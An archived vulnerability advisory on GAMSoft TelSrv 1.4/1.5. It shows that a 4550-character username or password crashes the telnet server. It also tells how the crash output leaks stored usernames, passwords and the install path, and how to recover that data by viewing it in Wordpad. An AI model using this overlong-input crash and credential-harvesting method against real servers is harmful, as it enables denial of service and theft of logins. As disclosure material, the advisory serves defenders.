COMMAND

    telnetd

SYSTEMS AFFECTED

    GAMSoft's TelSrv 1.4/1.5

PROBLEM

    Prizm found  following.   TelSrv is  superior Telnet  server.   It
    provides you with the  ability to remotely administer  his machine
    over any TCP/IP (internet) connection.  You can reboot,  shutdown,
    and have  full access  to the  command prompt  (DOS prompt) of the
    host machine.  Basically, anything you can do from the DOS  prompt
    on a computer, you can now do over the internet with TelSrv.

    The problem is bad bounds checking, when you connect to the server
    (port  23)  and  use  4550  characters  as  a username, the telnet
    service(telsrv.exe) crashes.

    Quick Example:

        Please Wait...Connection Accepted (TelSrv 1.5)

        Username : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        Password : *********************************************AdjustT
        okenPriveleges Failed : %lu
        AdjustTokenPriveleges Failed : %lu (%s)
        LookupPrivilegeValue Failed : %lu
        LookupPrivilegeValue Failed : %lu (%s)
        SeShutdownPrivilegeOpenProcessToken Failed : %lu
        OpenProcessToken Failed : %lu (%s)

        Requesting shutdown priveleges...

        Unknown command

        Goodbye!
        exitError : No priveleges for that operation
        dosshutdownShutdown fa

    Patrick Webster found this same.  I will drop here few his  lines.
    He  first  discovered  this  problem  when  trying  to perform the
    Denial of Service attack on TelSrv 1.5 which was reported not long
    ago.  He  downloaded TelSrv on  28 August 1999,  and after playing
    around  with  it,  decided  he  didn't  need it, thus uninstalling
    it and forgetting about it.   When he received the DoS report,  he
    remembered he still had the  installation, and decided to give  it
    a go.  What was odd, was that when I did it, TelSrv didn't  crash,
    it was working fine, prompting me for the password.  He decided to
    try sending the 4550 characters as the password, and when he  did,
    TelSrv crashed, sending back a bunch of unimportant characters.

    At first  Patrick thought  these characters  were worthless, until
    he noticed the message "Welcome  Admin!" which was the message  to
    be displayed upon login by user 'admin'.  He then figured that  if
    it displays  the admin  login message,  it may  very well  display
    other hidden details.  Patrick  setup another account to test  for
    this -  Username:   22222, Password:   11111.   He did  the  crash
    again,  and  to  the  surprise,  there,  in  the  bunch  of   junk
    characters, was the numbers 22222  & 11111!  He tried  this again,
    using different names, such as a1b2c3 and when he tried the  crash
    again, it  displayed what  looked like  encrypted characters  (eg.
    ?1u2=E43, not accurate though).

    With  this  in  mind,  Patrick  decided  that  he  would  find the
    encrypted values of each character, by creating account names such
    as ABCabc123!@# an so on, and writing a program to decrypt this.

    He created a text file, which was to contain the encrypted version
    of the character and a  decrypted version, and while he  was using
    'cut &  paste' to  transfer the  encrypted character  to the  text
    file, he noticed  that the character  had now changed  to its real
    form.   The character  had changed  due to  the difference  in DOS
    characters  to  Windows  characters  (??bit  -  32bit?),  the  DOS
    characters being shown  in telnet &  Notepad, whereas the  Windows
    symbols being shown in Wordpad.

    This  explains  why  the  numbers  were  the  same compared to the
    letters which were different.  So basically, all you have to do is
    use the DoS attack, using  4550 characters (maybe less?) and  copy
    the data which is forced back, viewing it with Wordpad or the like,
    and simply looking through the data for any recognisable words etc.
    One username always seems to be displayed after the files path, so
    that is a start.

    Some odd  things Patrick  noticed are  things such  as that TelSrv
    did  NOT  crash  everytime  he  performed  the operation.  He also
    noticed  that  it  did  not  always  display  the  full  username,
    password or whatever you're looking for.  Sometimes it didn't even
    respond  with  any  information,  just  another  login prompt.  He
    noticed that  when using  Windows95's default  telnet application,
    (telnet.exe), that the  information containing the  usernames etc.
    did  not  convert  the  usernames  to their original form, whereas
    SecureCRT did correctly display  the data, which was  what Patrick
    used for  this.   There are  quite possibly  many more interesting
    things people may come across,  people may even wish to  look into
    this further, maybe  even figure out  where the exact  location of
    the  different  usernames  &  passwords  occur  (if  there  is any
    formatting in the data) or maybe there is something else  valuable
    in the data (other than  revealing the remote path of  the server,
    in this case C:\PROGRAM FILES\TELSRV\).

SOLUTION

    Vendor knows about it.